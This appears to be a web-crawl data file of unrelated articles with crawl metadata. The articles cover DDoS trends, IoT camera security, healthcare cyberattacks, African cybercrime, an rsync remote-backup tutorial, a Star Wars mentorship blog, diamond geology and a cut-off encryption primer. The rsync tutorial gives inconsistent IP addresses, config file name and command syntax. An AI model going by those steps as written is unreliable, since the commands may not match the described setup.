Motivations behind DDoS attacks vary widely. Some are executed by lone individuals or hacktivists. Others have a financial angle, including disrupting competitor business or extortion, whereby the perpetrators install ransomware on the target company’s servers and demand a payout to restore services. DDoS is even used as a cyber weapon by nation-states, targeting critical network infrastructure and systems.
Attacks on the upswing
At a time when the cloud, IoT and 5G are transforming the digital world, networks have become even more important. More so after the advent of COVID-19, which has increased the reliance on the internet manifold. Unfortunately, the pandemic has also led to a growth in DDoS traffic. Apart from the 100 percent increase in “high watermark levels” – daily peaks in DDoS traffic, DDoS has grown to be a terabit level daily reality for many networks globally, with imminent and more damaging potential for attacks over 10-15 Tbps. As more than 10,000 attacks from internet providers worldwide were analysed in the DDoS in 2021 report, a perceptible shift has been noted in the threat patterns, with attacks moving beyond PCs and emerging from outside and inside service provider networks, aiming for internet hosts and servers, customers, users, and network infrastructure globally.
“Over the last year, the vast majority of DDoS has now transitioned essentially to IoT devices, other types of cloud servers and compromised cloud accounts,” says Dr. Craig Labovitz, CTO of Nokia Deepfield.
“The IoT devices mostly come with exploitable bugs in their embedded operating systems or web servers. Others, including hundreds of thousands of devices, ship with a default password,” he adds.
While most DDoS attacks are treated as a nuisance, high-bandwidth and high-packet-intensity volumetric attacks are worrying. With volumetric amplification DDoS, attackers leverage increased bandwidth and connectivity to deploy millions of servers and unsecured and compromised IoT devices to target and saturate interfaces, routers, load balancers, firewalls, and network hosts.
Large-scale DDoS attacks can be fatal for network routers and infrastructure, disrupting connectivity and service availability for communication service providers (CSPs), enterprises and consumers. They can lead to losses ranging from thousands to millions of dollars.
“It’s worth noting that although some big attacks get the headlines, many go unreported because service providers do not want to expose details about their security capabilities or vulnerabilities. Even worse, attacks can go undetected by service providers until reported by users on social media,” says Alex Pavlovic, Director, Product Marketing at Nokia Deepfield.
Spike in botnet DDoS
Botnet DDoS is one type of traffic that has exhibited significant growth since mid-2021. In the second half of the year, in marked contrast to the pre-IoT era, most of the largest DDoS attacks exclusively leveraged large-scale botnets. Today, botnet DDoS is the source of tens of thousands of attacks daily, with each of them involving anywhere between several thousand and several million IP addresses. It is estimated that between 100,000 and 200,000 active bots are engaged in these attacks.
Nokia Deepfield estimates IoT botnet and amplifier attack capacity to be over 10 Tbps, a significant two to three times increase from the size of any publicly reported DDoS attacks to date. In 2021, aggregate daily DDoS traffic volumes peaked at over 3 Tb/s, with further growth recorded in 2022.
What’s making the situation worse is the difficulty in detection and mitigation. In the past, the basic tool to counter DDoS were offline “traffic cleansing systems” called scrubbers, which identified and removed malicious traffic and returned genuine traffic back to the network. These countermeasures were successful in thwarting the common amplification/reflection and synthetic traffic which normally does not exist as such on the internet. But this approach worked well when traffic volumes were manageable. The sheer volume growth scale puts this approach’s cost effectiveness in question, along with additional delay and backhaul costs introduced.
Botnet DDoS, unlike predecessors, uses valid IP addresses, full TCP-IP stacks, legitimate OS-generated protocol headers, correct checksums, and payloads carefully crafted to match normal application traffic. The problem with the older detection algorithms used by legacy scrubber-based solutions is that they require meaningful features for extraction. Features most of today’s large-scale botnet DDoS attacks don’t carry.
“What changes with botnets is that the packets are often encrypted; they often use Transport Layer Security (TLS). And again, because they’re botnets and not just a few servers, you’ve gone from two or three servers launching a DDoS to now 10,000 or 100,000 bots, all of which have independent CPU memory capacity, often running full Linux stacks,” says Labovitz.
Addressing the new challenge
The big question facing network operators currently is how to prepare for this formidable threat, given the exponential rise in botnets and their ability to generate realistic application payloads. The current approaches to DDoS protection are hobbled by multiple factors, including protection provided only to a few customers or systems, inability to scale, performance degradation, and prohibitive cost.
According to Labovitz, three things need to happen to address the threat.
A better job must be done in educating IoT manufacturers. This, along with the implementation of industrywide best common practices. Secondly, security should not be an add-on to the network. “We’re approaching the point where we can no longer add security as an afterthought. It must be foundational to the infrastructure,” he says. Finally, changing the way security experts should approach detection and mitigation. Nowadays, DDoS isn’t coming from specific countries or servers; it’s coming from botnets and from everywhere, including one’s own network.
To safeguard from the new generation of threats, a new and robust DDoS defence must:
- Protect everything and everyone
- Provide real-time detection with better accuracy
- Deliver cost-effective, agile, terabit-level mitigation
- Automate mitigation of complex security policies to drive real-time surgical removal of DDoS threats and attacks
The system needs to provide cloud-era visibility beyond IP addresses and include visibility into the larger internet context, including services, CDNs, websites and IoT devices. At the same time, it must be flexible and capable of detecting new and emerging threats as they develop and evolve.
Hybrid network architectures that combine physical and virtualized network domains are proliferating and creating even more distributed sets of network boundaries that need to be monitored for both ingress and egress DDoS. With the increased number of endpoints that need to be protected – customers, end devices and systems, plus network infrastructure – DDoS security must deliver improved performance with scalability and automation.
Advanced, big data IP network analytics and programmable routers can efficiently block most of the DDoS attacks on the internet. More scalable and cost-effective mitigation can be achieved using the concept of a self-defending network. This means embedding security in the IP network and combining advanced detection capabilities with sophisticated features of the latest generations of router silicon, which allow security enforcement at line speed.
“As the DDoS threat evolves and better tools emerge to combat the menace, the internet community needs to take a firmer stance. The battle against DDoS must be fought with technology and with more involvement and better cooperation from service providers, hyperscale cloud builders, end users, regulators, and governments,” says Pavlovic.
|
<urn:uuid:93ef5a6e-7de9-4ab1-9af2-d6be4e2b53d0>
|
CC-MAIN-2022-40
|
https://ciotechasia.com/the-changing-ddos-threat-landscape/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335004.95/warc/CC-MAIN-20220927100008-20220927130008-00447.warc.gz
|
en
| 0.936848 | 2,131 | 3.140625 | 3 |
This question is key in today’s security world, when focusing on security cameras. As part of the IoT world, security cameras of today are playing important roles not only in the security area, but also in providing intelligence to accelerate operational efficiency and decision-making in many other business areas. As they become smarter and more complex, their cybersecurity risks also grow. In recent years, the world experienced several examples of cybersecurity incidents with cameras, with the “Mirai Botnet” as one of the most well-known examples. Mirai malware took advantage of insecure IoT devices in a simple but clever way. It scanned the internet for open Telnet ports, then attempted to log in with default passwords. In this way, it was able to amass a botnet army, using the computer power of millions of cameras with default passwords worldwide.
The Mirai Botnet took place in 2016 and, luckily, the cybersecurity of IoT devices has improved significantly since then. But, some things are still the same and/or cannot be changed. Mikko Hypponen, a Finnish cyber evangelist, is well-known because of his statement: “If a device is smart, it’s vulnerable!”. He shows with this statement that all devices that consist of hard- and software and are connected to the internet, are insecure (and therefore ‘hackable’). Although he made this statement some years ago, it is still true and very relevant – an example of something that hasn’t changed.
Security cameras are IoT devices and, therefore, are vulnerable. They are also abundant on the market in a number of forms and are being designed, developed and built by several producers from different countries. Current cameras are so technologically advanced that they come with lots of complex processes and computer power onboard.
These technological developments provide incredible innovative security capabilities, but also serious digital risks. The cameras consist of advanced hard- and software components that are produced both in-house and by third parties. Because of this complexity, such a camera can be seen as a kind of ecosystem on its own and it’s extremely challenging to protect it holistically against the things that could possibly go wrong in this ecosystem. A camera becomes an interesting and inviting attack surface for the ‘bad guys’.
Luckily, cybersecurity has also evolved in recent years and there are different kinds of digital security measures for cameras that can be applied by the camera manufacturers. But, this firstly requires the willingness of the camera manufacturer to put effort and budget into the security of the camera itself. This becomes a key question in this discussion.
As stated before, all security cameras are vulnerable. However, it’s also true that the more difficult it is to hack a camera, the more likely it is that a cyberattacker will jump to another camera that’s easier to hack. Cyberattackers are very smart and sophisticated, but also very pragmatic. They prefer easy targets (if they achieve a similar result). A camera manufacturer that invests in building a cybersecurity foundation that ensures more cyber-resilient cameras, will become a less favourable target for those cyberattackers, because they prefer to focus on cameras that generate the same results with less effort (in other words ‘easier to hack’).
All camera manufacturers and customers need to be fully aware that the more cyber-resilient their cameras are, the less interesting they are for unauthorised hackers to gain access. This cyber resilience requires serious cybersecurity investments in a solid foundation and one of the most effective investments is the implementation of Secure-by-Design into the production process. This means that cybersecurity is built-in during each phase of the production process and not seen as an after-thought when the camera is produced and implemented at the customer’s location. A good example of a Secure-by-Design production process within the IoT industry is the Hikvision Secure Development Life Cycle (HSDLC) as described in the Hikvision Cybersecurity Whitepaper.
Besides the Secure-by-Design implementation, there are other cybersecurity investments that show the commitment of an organisation towards the fundamental cyber resilience of its IoT portfolio. A Security Response Centre is another example. This centre comprises a dedicated team of cybersecurity professionals that responds to and handles customer-submitted security incidents and security matters.
So, a security camera is an IoT device and vulnerable for hackers that are looking for unauthorised access. But, it doesn’t have to be that way, because camera manufacturers can improve the cybersecurity of their IoT devices significantly as long as they take this task very seriously and are willing to invest in the fundamental building blocks of its cybersecurity. Secure-by-Design and a Security Response Centre are just two examples of these investments. The question to consider is whether a company is aware of this and is willing to invest in cybersecurity. Because at the end of this story, it’s not necessarily cameras from one area or lower-priced cameras that will be breached, but cameras from those that don’t take product cybersecurity seriously.
|
<urn:uuid:757d348f-e283-4886-a25e-ebeca9a3ed0a>
|
CC-MAIN-2022-40
|
https://internationalsecurityjournal.com/security-cameras-cybersecurity/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335004.95/warc/CC-MAIN-20220927100008-20220927130008-00447.warc.gz
|
en
| 0.962546 | 1,043 | 2.90625 | 3 |
As if the healthcare industry wasn't dealing with enough stress and disruption right now, it's also getting hammered with cyberattacks like spear phishing and ransomware. Some criminal groups have promised to avoid targeting healthcare organizations during the COVID-19 crisis, but most are still willing to attack.
Increasing numbers of healthcare providers in the United States and Europe have fallen victim to cyberattacks, and many of them have been linked to Maze ransomware. This ransomware will not only encrypt data, but it will exfiltrate that data to use in a “backup” extortion attempt. If the victim refuses to pay the ransom, the group behind the attack threatens to publish the private data.
The healthcare industry has been a favorite target for years because criminals have multiple ways to monetize the attack:
- Disruption of IT services can slow operations to a fatal pace. Criminals are betting that a ransom will be paid, especially during emergencies when normal operations require greater urgency.
- Exposure of protected (or personal) health information (PHI) and electronic health records (EHR) can be devastating to organizations and individuals. Criminals who exfiltrate data from the organization can then threaten to publish it if a ransom is not paid.
- PHI and EHR are valuable to other criminals and can be sold for a higher price than a credit card or social security number. Criminals can also keep these records for their own identity-theft schemes.
- The worldwide response to the novel coronavirus, COVID-19, has criminals trying harder to get into networks. Any information on a possible cure or vaccine would be of great interest to private buyers and other governments. Research labs, testing facilities, hospitals, and the World Health Organization are just some of the targets we've seen so far.
Types of attacks against healthcare organizations
Spear phishing: This attack works well and is often the first attempt to get into a company's system. This is not a new type of attack, but the pandemic has provided a lucrative new way to bait victims. People are anxious to get information about the pandemic and the economy, so they are more likely to open and act on an email message related to COVID-19. Healthcare organizations may also be targeted with messages about protective equipment, testing kits, and other supplies.
Ransomware: This is an attack that many cybercriminals love. This malware encrypts data in a way that blocks users from being able to use their files, databases, and other computer systems until they pay a ransom. This is an old attack, but it continues to evolve and present new challenges for healthcare organizations. Cybersecurity Ventures predicts that ransomware will attack a business every 11 seconds by the end of 2021.
Malware: Not all malware is ransomware. Bots, spyware, rootkits, and viruses are all examples of malware that doesn't make any demands for ransom. These attacks still cause damage, cost their victims money, and can eventually lead to other attacks including ransomware. Healthcare organizations and other companies that fall victim to malware infections can experience system problems, data loss, and slower network response due to bots or other malicious traffic.
What you can do
- Maintain strong network security with advanced features like intelligent perimeter protection, user identity awareness, application control.
- Deploy multiple layers of email protection to defend your organizations against spear phishing and malware attacks. Include email backup and archiving for data protection, and configure data leak protection to stop critical data from leaving your business via email.
- Provide a regular cadence of security awareness training for your users.
- Evaluate your backup strategy and confirm that it meets your current needs and is capturing all of the data being generated by the new remote workforce.
- Consider providing a cloud-based web security solution that will protect users from malicious websites and file downloads.
- Enforce best practices when it comes to patch management, password complexity, encryption, and endpoint protection.
Healthcare may always be a target, but your healthcare organization doesn't have to be a victim. With the proper systems and processes in place, you can keep your company protected from cyberattacks.
Christine Barry is Senior Chief Blogger and Social Media Manager at Barracuda. Prior to joining Barracuda, Christine was a field engineer and project manager for K12 and SMB clients for over 15 years. She holds several technology and project management credentials, a Bachelor of Arts, and a Master of Business Administration. She is a graduate of the University of Michigan.
Connect with Christine on LinkedIn here.
|
<urn:uuid:0a09e5cf-5b00-4c81-b8fd-f860f358a8cf>
|
CC-MAIN-2022-40
|
https://blog.barracuda.com/2020/04/16/healthcare-organizations-facing-new-cyberattacks/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335276.85/warc/CC-MAIN-20220928180732-20220928210732-00447.warc.gz
|
en
| 0.942835 | 936 | 2.734375 | 3 |
The terrorist threat to our nation’s physical and economic security is always with us. Preparing, preventing and responding to attacks is more critical than ever before given the increasing sophistication and creativity of those who wish to do us harm. Agencies and individuals at all levels of government as well as the private sector must remain knowledgeable, vigilant and prepared. These sessions will increase your awareness and understanding of these threats, and how to protect our nation.
Law Enforcement remains the first line of defense against threats to the homeland and the communities they serve. It is imperative that these 1st responders have the strategic and tactical knowledge to meet the challenge of the familiar and the unexpected. Front line to the highest levels of command, these sessions will enable attendees to fine tune their leadership skills and learn valuable lessons that can be implemented quickly and effectively.
Cybercrime and cyber terrorism are a growing national security threat. Whether from foreign governments, organized crime or terrorist organizations, cyber-attacks are increasing in intensity. No single process will stop these attacks; new approaches and increased vigilance are required. These sessions will provide an understanding of the nature and source of these attacks and how to protect against them.
From physical threats to the cyber threats to control systems, threat to our nation’s critical infrastructure continues to rise. Government and the private sector must implement strategies and technologies that protect critical sectors of our economy in an advanced persistent threat environment. These sessions examine the increased exposure to attacks upon our critical infrastructure and how to best protect and secure these key resources.
The need for flexible, scalable and effective access control system that protects people, assets and facilities is of prime importance to security professionals. Physical access control, perimeter security and video surveillance are all components of an effective system. These sessions address the materials, equipment, systems and procedures and how to integrate them into a comprehensive physical security infrastructure.
Tragic incidents at schools and universities have elevated the need for school administrators, emergency managers, and security personnel to create and maintain a safer campus environment. Security experts and leaders from public and private institutions at all levels will educate attendees with strategies, best practices and case studies for effectively preparing, preventing and responding to threats to students, facility, administration and staff.
|
<urn:uuid:ac0f4d16-514a-45b1-ae66-70fcc6ad30f6>
|
CC-MAIN-2022-40
|
https://govsecinfo.com/events/govsec-west-2013/information/conference/track-descriptions.aspx
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335424.32/warc/CC-MAIN-20220930020521-20220930050521-00447.warc.gz
|
en
| 0.931795 | 451 | 2.53125 | 3 |
Saturday, October 1, 2022
Published 2 Years Ago on Thursday, Nov 05 2020 By Karim Husami
With the ongoing pandemic and the rapid shift to digital, many countries around the world are facing increased cybersecurity threats. However, the problem becomes much bigger when there are no sufficient laws in place to safeguard internet users. As such, countries in Africa are currently experiencing a wave of cybercrime.
Africa is one of the fastest developing continents globally with over a billion Africans estimated to have internet access by the end of 2022, according to the British consulting firm Ovumone.
The danger of high internet penetration means that malicious online activities will soar in the region.“Cybercrime is shifting towards the emerging economies. This is where the cyber criminals believe the low-hanging fruit is,” Bulent Teksoz, of Symantec Middle East noted.
Cybercrimes cost African economies $3.5 billion in 2017, according to Kenya-based IT and business advisory firm Serianu, with annual losses reaching $649 million for Nigeria, and $210 million in Kenya. In addition, South Africa loses $157 million annually due to cyberattacks, according to the South African Banking Risk Information Centre (SABRIC).
Although cybercrimes are affecting many countries across Africa including, Kenya, Nigeria, Ghana, Uganda, the issue may not be considered a priority amid pressing socio-economic challenges. However, the high digitization of activities in countries require more governments to protect the growing number of users making online transactions. According to reports, 86% of South Africans frequently use online banking services, which is higher than many countries in the Middle East and Turkey.
The problem intensifies as internet penetration increases. Many African internet users lack the skills to protect themselves from rising cyberthreats. Countries are in need of a regulatory framework and a national system for better cybersecurity protection. According to Robert Kayihura, of counsel at Covington & Burling in South Africa. “Only nine African countries have data protection legislation and another 22 have draft regulations pending.”
Some enterprises in Africa are adopting solutions like Atlas VPN, a virtual private network service that allows fast connection speeds safely and securely. Solutions of this kind improve cybersecurity by making it harder for hackers to infiltrate or disrupt a network.
It is a great point of frustration for many of today’s youth that while the rest of the world’s industries and sectors are digitized and evolving with time, the education system feels stuck in the 1920s – at least outside of developed countries. Many parents and children alike are yearning for a more futuristic education […]
Stay tuned with our weekly newsletter on all telecom and tech related news.
© Copyright 2022, All Rights Reserved
|
<urn:uuid:cb37f99b-c89a-4be7-803f-052d3e619e98>
|
CC-MAIN-2022-40
|
https://insidetelecom.com/cybersecurity-in-africa-the-challenges-ahead/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335609.53/warc/CC-MAIN-20221001101652-20221001131652-00447.warc.gz
|
en
| 0.925456 | 583 | 2.59375 | 3 |
We cannot emphasize enough the importance of having a backup. Natural disasters, cyberattacks, or other devastating events can happen when you least expect them. To be on the safe side, it is always recommended to have round-the-clock system backups to ensure business continuity in case of service interruption.
One of the more useful backup utilities for Linux systems is the rsync utility. Rsync, short for remote sync, is a data transfer and synchronization tool that intelligently transfers and synchronizes files between directories or across networked computer systems. It achieves this by comparing file sizes and modification times. If the file size and modification times are different, then it transfers the files from the directory or system that hosts the files to another directory or remote system.
Rsync is configured to securely transfer and synchronize data over the SSH protocol. The file synchronization happens immediately, and with the proper backup testing process in place, you can rest assured that you have a safe, accurate backup.
In an earlier tutorial, we covered how to make local backups using rsync. In this guide, we will go a step further and demonstrate how to make a remote backup — i.e., your data is stored in a separate machine — using the rsync utility.
As you get started, ensure you have the following:
- SSH is installed and running on both the local and destination servers. Chances are SSH daemon is already installed and no further action is required.
To check the version of SSH you are running, run the following command:
$ ssh -V
- In addition, you need two Linux servers — the source or local server and the remote server. Here is the lab setup we will use to demonstrate how rsync works:
Local Server IP: 220.127.116.11 (Ubuntu 20.04)
Remote Server IP: 18.104.22.168 (CentOS 8)
- Lastly, ensure you have a local user configured with sudo privileges.
Step 1: Install Rsync on the Local Server
To start off, ensure that rsync is installed. In this example, we will install rsync on the local server (Ubuntu 20.04) as follows:
$ sudo apt install rsync
Once installed, start and enable the rsync service.
$ sudo systemctl start rsync
$ sudo systemctl enable rsync
To confirm that rsync is installed, run the command:
$ rsync --version
The output below confirms that we have rsync installed:
Step 2: Install and Configure Rsync on the Destination Server
In addition to installing rsync on the source or local server, we also need to install it on the destination server or cloud server. To install rsync on CentOS 8, use the DNF package manager as follows:
$ sudo dnf install rsync rsync-daemon
Once installed, confirm it is installed with the following:
$ rpm -qi rsync
Next, you need to configure rsync to allow remote connections from the source or local server. To do so, create a configuration file as follows:
$ sudo vim /etc/rsync.conf
Then paste the following lines in the configuration file. The
path directive specifies the path to the destination backup directory while the
hosts allow directive indicates the IP address of the source server.
# add to the end
pid file = /var/run/rsyncd.pid
log file = /var/log/rsyncd.log
max connections = 4
# log transfer results or not
transfer logging = yes
# any name you like
# target directory to copy
path = /home/user/backup
# hosts you allow to access
hosts allow = 22.214.171.124
hosts deny = *
list = true
uid = root
gid = root
read only = false
Save and exit.
Then start and enable the rsync service.
$ sudo systemctl start rsyncd
$ sudo systemctl enable rsyncd
And confirm the rsync daemon is running.
$ sudo systemctl status rsyncd
If SELinux is enabled, configure the Boolean setting as follows:
$ setsebool -P rsync_full_access on
Next, configure the firewall to allow rsync service:
$ sudo firewall-cmd --add-service=rsyncd --permanent
$ sudo firewall-cmd --reload
Now let’s put our setup to test and see if we can successfully back up data from the source server to the remote server.
Step 3: Test the Configuration
To test the file backup process, log back into the source server. We already have a directory in our home folder containing a few files that need to be backed up.
To save and sync files remotely, rsync takes the following syntax:
$ sudo rsync -avz -e ssh SOURCE_DIRECTORY DESTINATION_IP::backup
SOURCE_DIRECTORYis the directory to be backed up.
DESTINATION_IPis the IP address of the remote or destination server.
In our example, the full command will be:
$ sudo rsync -avz -e ssh /home/jumpcloud/data/ [email protected]:/home/user/backup
The directory to be backed up on the local or source server is the
/home/jumpcloud/data/ folder and the destination backup directory is the
/home/user/backup folder. You can create your own source and destination directories in different paths as you deem fit.
From the output of running the command, the files were transferred successfully to the remote server. This is proof that the file transfer worked.
Step 4: Automate the Backup Process
By default, rsync does not have a built-in automation process for backing up and syncing files without user intervention. Fortunately, we can automate the backup process by creating a shell script with the backup command and automating the script to run at specific times using a cron job.
But first, we need to configure passwordless SSH authentication between the local and remote server since rsync uses SSH to initiate a connection between the two and securely transfer files.
Therefore, generate an SSH keypair as follows:
This generates both a public and private key which are cryptographic keys that are saved in the
Now, we need to copy the public key to the remote server to enable passwordless SSH authentication. To do so, we will use the
ssh-copy-id command as follows:
$ ssh-copy-id [email protected]
When prompted, authenticate with the remote user’s password. The public key is saved in the
authorized_files in the .
ssh directory on the remote server’s home folder.
To verify that password authentication has been disabled, we will try to log in to the remote server normally as shown.
$ ssh [email protected]
Now, we are going to create a shell script that will contain the backup command.
$ sudo vim backup.sh
The first line starts with a shebang header — a signature of all shell scripts — followed by the backup command.
rsync -avz -e ssh /home/jumpcloud/data/ [email protected]'126.96.36.199':/home/user/backup
Save the script and exit. Next, make the shell script executable:
$ chmod +x backup.sh
The last step is to automate the running of the script using a cron job. To create a cron job, issue the command:
$ crontab -e
This opens the crontab file. At the very bottom of the file, add the following line:
05 22 * * * /home/jumpcloud/backup.sh
The line stipulates that the script will run at exactly 10:05 p.m.
Save the script and exit. You should see the output indicating that a new crontab is being installed.
You can list the cron jobs using the command:
$ crontab -l
To simulate the file synchronization, we added two additional files in our
data directory in our source server. When the clock ticked 10:05 p.m., the synchronization happened as evidenced in the output when we listed the contents of the backup directory.
This time around, you can see that additional files were added to the backup directory.
We even verified the synchronization occurred by viewing the
/var/log/syslog log file.
$ cat /var/log/syslog log
We have successfully enabled remote file backup using rsync. With rsync, you can back up an entire home directory or any directories of your choice to a remote server. If you are working on a system that has constantly changing data, it’s advisable to set the backup to take place at shorter time intervals as long as this does not impede network speed and disrupt users working during business hours.
Interested in learning about other strategies you can use to ensure the security of your Linux system? Check out one of the recommended tutorials here.
|
<urn:uuid:88e0bc7e-9eca-43ac-9daa-e8fe8e333c59>
|
CC-MAIN-2022-40
|
https://jumpcloud.com/blog/how-to-use-rsync-remote-backup-linux-system
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335609.53/warc/CC-MAIN-20221001101652-20221001131652-00447.warc.gz
|
en
| 0.850544 | 1,934 | 3.078125 | 3 |
The Star Wars saga has many recurring themes – the struggle between desire and destiny, good and evil, impulse and discipline. However, a theme that particularly stands out throughout the series is the examination of the relationship between student and teacher. This theme is similar to the relationship that an IT provider should strive to have with their clients.
For today’s Star Wars Day blog, we’ll review some of the lessons that a professional can learn from the Star Wars films, as well as what the insights that the relationships shared by the characters can reveal about being a mentor, as well as the mentored. To do so, we’ll examine some moments and characters from the complete series thus far – Episodes I through VIII – and the stand-alone Rogue One.
WARNING: this article may spoil a few key moments from the series, so continue at your own caution.
How to Be a Mentor, According to Star Wars
There is no shortage of those who could be considered mentors throughout the series. From Qui-Gon Jinn and Obi-Wan/Old Ben Kenobi, Luke Skywalker and Leia Organa, and finally, Yoda, many characters accept the mantle of mentor… albeit begrudgingly, at times.
In order to be a mentor, there are two requirements that each of these characters present during the series. Likewise, many characters also exhibit just one or the other characteristic. Yet, as they do not exemplify both qualities, they don’t quite qualify as a true mentor. We will explore these characters in more detail later.
These two requirements are to be a committed educator, as well as an equally committed leader. Each of the mentors listed above have had the opportunity to be both. Qui-Gon took the initiative to take a young slave into his care, campaigning to the Jedi Council for the ability to teach him. When Qui-Gon was dispatched by Darth Maul, Obi-Wan rose to the occasion and took up Anakin Skywalker as his padawan learner.
Years after Anakin succumbed to his fear and hubris to be reborn as Darth Vader, Obi-Wan continued to be a mentor under the name Ben Kenobi, teaching the Skywalker of the next generation how to embody the principles of the Jedi. Once this Skywalker, Luke, had learned to be a leader, he teamed up with his long-lost sister, Princess Leia Organa, to defeat the Empire. While Leia continued to lead an underground organization committed to fighting the Empire’s last remnants, Luke retreated to a sanctuary to ensure he was able to train the next worthy Jedi.
Finally, we would be amiss if we neglected to mention Yoda’s involvement as a leader throughout the saga. From the very beginning of the story, Yoda was a respected leader of the Jedi Order, proving his worth on the battlefield and in the Senate. When the Empire rose, he retreated to his home planet in wait of the next generation of Jedi to train. He then passed on but returned as a Force ghost to impart his wisdom again, later in the series’ timeline.
Lining Up Star Wars Mentorship with Our Own (and with The Odyssey)
As one might imagine, the concept of mentorship has been around for much longer than Star Wars has been. In fact, we get the word “mentor” from a character in Homer’s epic poem, The Odyssey. Mentor was entrusted by the protagonist, Odysseus, to care for his son in his absence, and later assisted the young prince Telemachus in reuniting with his long-lost father by serving as his guide and, well, mentor.
In this way, Mentor serves a very similar purpose as many of the characters from Star Wars. By teaching another character and acting as a leader, he allows the protagonists to succeed in their quest – or, in the terminology more likely to be used in Star Wars, their mission. Furthermore, like the mentors to be found in Star Wars, Mentor shares a few characteristics with the mentors we see in the business world.
What Makes a Mentor, a Mentor
We’ve already established that a mentor should be a sort of amalgamation of a teacher, and a leader. This is admittedly a tricky balance to find, until you describe what kind of leader and teacher makes a mentor.
First, as a leader, you have to be able to be supportive as you take charge. As you work with a mentee, commit the time that the mentee needs to grow and devote your full attention to them. Just as Ben Kenobi understood Luke’s rage and bitterness after his aunt and uncle were slaughtered by the Empire’s stormtroopers, you need to be able to emphasize with your acolyte and guide them towards the higher purpose you can see them achieving.
As a teacher, it is important to also challenge those who you mentor. Not only should you assign tasks for your student to complete, these tasks should test the limits of their ability and set a standard that you expect them to meet. As Yoda challenged Luke to lift his X-wing fighter out of the swamps of Dagobah, he wasn’t coddling his student. Neither should you.
It is also important that, as their teacher, you review the lessons that have been imparted. These discussions will not only help ensure the information is retained, it will also encourage your mentee to draw their own conclusions. Remember, teachable moments happen all the time – it’s up to you to embrace them.
Finding Poor Examples in Rogue One
Alternatively, Rogue One offers a few examples of how to very much not be a positive leader. At the very beginning of the film, protagonist Jyn Urso’s father, Galen, is pressured into returning into the Empire’s service and designing the ultimate superweapon: the planet-destroying Death Star. In addition to being forced to work on a project he detests, he is stuck in a thoroughly unpleasant work environment. Oh, and did we mention that his wife was murdered and his daughter lost to him during the attack?
It should be no wonder, then, that instead of being loyal to his ‘employers,’ Galen instead decides to sabotage their operation from the inside. Hiding a critical weakness in the Death Star and sending word of it to the Rebel Alliance, Galen embodies the corporate espionage that a disgruntled employee could leverage against your business. A good leader sees the value in keeping an employee happy in two ways – first, it helps to keep that employee engaged and productive, and secondly, it reduces, if not eliminates, any ill will toward the organization.
In another example of the Empire’s failings in Rogue One, the antagonists of the film also leverage shady office politics to get a leg up on their superiors. For instance, Director Krennic elects to go over his commander’s head and out of the traditional chain of command, reporting directly to Darth Vader. As a commanding officer himself, Krennic serves as an example of what happens when office politics supersede the typical chain of command – and winds up being Force-choked into oblivion for his troubles. While it is highly unlikely that deviating from the chain of command will get you strangled like Krennic, it certainly doesn’t reflect well on you and shows a distinct lack of leadership and respect for the chain of command.
All this only goes to show that lessons in leadership can be found anywhere you look – even in a galaxy far, far away. Do you have any Jedi masters or mentors in your life? What have you learned from them? Share your thoughts in the comments and may the Force be with you!
|
<urn:uuid:99086479-cf1c-4e99-8ab2-5c41210a81e6>
|
CC-MAIN-2022-40
|
https://www.excaltech.com/what-star-wars-can-teach-about-mentorship/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335609.53/warc/CC-MAIN-20221001101652-20221001131652-00447.warc.gz
|
en
| 0.974522 | 1,598 | 2.6875 | 3 |
A study of 26 diamonds, formed under extreme melting conditions in the Earth’s mantle. The results show that certain volcanic events on Earth may still be able to create super-heated conditions. Previously thought to have only existed early in the planet’s history before it cooled. The findings may have implications for diamond prospecting.
Diamonds categorized by their inclusions minerals trapped within the carbon crystal structure. That give clues about the conditions and the rocks in which they formed. The studied diamonds contain harzburgitic inclusions. A type of peridotite the most common rock in Earth’s mantle which have experienced extreme temperatures and undergone very large amounts of melting.
The study led by researchers at the Vrije Universiteit (VU) Amsterdam used radioisotope analysis to date tiny inclusions trapped in diamonds from the Venetia mine in South Africa. Results showed that the diamonds had formed in at least two separate events. Nine of the diamonds had an age of around 3 billion years. Linked to volcanism caused by the break-up of an old continent that led to large-scale melting.
However, ten diamonds dated as just over a billion years old. Correlating with a giant volcanic event at Umkondo in southern Zimbabwe, 1.1 billion years ago.
Gareth Davies, co-author of the study, commented, “This is a fascinating insight into the inner workings of planet Earth. While young diamonds are formed in other types of rocks and conditions in the mantle, it’s very unexpected to find harzburgitic diamonds linked to relatively recent geological activity. As harzburgitic rocks are important markers for diamond prospecting, the findings may have implications for the geological environments where we look for new diamond mines.”
“Conventional thinking has been that the level of melting needed to create these diamonds could only happen early in the history of the Earth when it was much hotter. We show that this is not the case and that some harzburgitic diamonds are much younger than assumed.
We propose that our younger set of diamonds formed in a special environment. A major plume from the deep mantle raised towards the surface. Moreover, underwent extensive melting as the pressure reduced,” said Janne Koornneef, who led the study.
Finally, the analysis of the diamonds at VU Amsterdam was funded by Europlanet 2020 Research Infrastructure and the research was funded by the European Research Council. The De Beers Group of Companies donated the diamonds used in this study.
|
<urn:uuid:68a22f32-250c-4856-a9e5-a583632fad3b>
|
CC-MAIN-2022-40
|
https://areflect.com/2017/09/23/geologists-prove-earth-can-still-resist-extreme-heat/
| null |
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337625.5/warc/CC-MAIN-20221005105356-20221005135356-00447.warc.gz
|
en
| 0.950975 | 529 | 3.9375 | 4 |
Types of Encryption for in Motion, in Use, at Rest Data
Tuesday, August 9, 2022
Encryption is the process of altering data in order to hide its content and ensure confidentiality. Entities that do not have the decryption key in their possession cannot decrypt the data and, therefore, read its content.
How does encryption work?
Plaintext data is transformed, using an encryption algorithm and a secret key, to ciphertext, which is unreadable text.
There are two types of encryption algorithms:
In symmetric algorithms, the key used to perform the encryption is the same as the one used to decrypt it and is, therefore, secret.
Examples of symmetric algorithms are:
- DES (Data Encryption Standard),
- 3DES (Triple DES),
- AES (Advanced Encryption Standard).
The latter one is, in 2022, the industry standard and is recommended to be used with 128 bits keys.
Image source – cisco.com
Asymmetric algorithms use two different keys: a public key for encryption and a private key for decryption.
Asymmetric algorithm examples are:
